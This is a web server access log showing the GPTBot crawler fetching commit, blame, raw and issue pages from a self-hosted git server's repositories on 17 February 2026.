-[17/Feb/2026:17:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" -[17/Feb/2026:17:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7666] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" -[17/Feb/2026:17:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=open" -[17/Feb/2026:17:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=open" -[17/Feb/2026:17:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" -[17/Feb/2026:17:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore?display=source" [Client 74.7.227.38] [Length 12001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:17:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:17:11:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" -[17/Feb/2026:17:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" -[17/Feb/2026:17:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211253] [Gzip 18.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" -[17/Feb/2026:17:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72039] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72041] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72039] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72041] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:17:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25603] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.html" [Client 74.7.227.38] [Length 11102] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 